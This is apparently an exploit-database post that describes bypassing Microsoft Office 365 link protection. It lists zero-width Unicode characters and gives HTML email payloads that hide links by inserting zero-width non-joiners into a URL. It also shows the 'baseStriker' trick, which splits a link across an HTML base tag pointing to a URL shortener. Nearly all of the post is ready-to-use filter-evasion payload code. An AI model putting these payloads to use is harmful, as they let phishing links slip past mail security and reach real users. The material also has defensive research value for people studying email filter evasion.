Title: Exploit-Zero-Width Spaces to Bypass MS Office 365 ProtectionAuthor: ajayverma
Zero-Width Spaces to Bypass MS Office 365 Protection
​ - Zero-width space
‌ - zero width non-joiner
‍ - zero width joiner
 - zero width no-break space
0 - full width digit zero

​ (Zero-Width Space)
‌ (Zero-Width Non-Joiner)
‍ (Zero-Width Joiner)
 (Zero-Width No-Break Space)
0 (Full-Width Digit Zero)



<!DOCTYPE html>
<html lang="en">
<head>

</head>
<body>
This is a test <a href="https://ashcois&#8204;.nut.&#8204;cc">Link</a>
</body>
</html>

====================================================================
baseStriker attack
<!DOCTYPE html>
<html lang="en">
<head>

</head>
<body>
Normally, a malicious <a href="https://ashcois&#8204;.nut.&#8204;cc">Link</a> is blocked.
</body>
</html>


<!DOCTYPE html>
<html lang="en">
<head>
<base href="https://bit.do">
</head>
<body>
But by spliting the URL, the <a href="ee9mr">Link</a> gets through.
</body>
</html>


Submitted On: 2019-05-27 09:52:06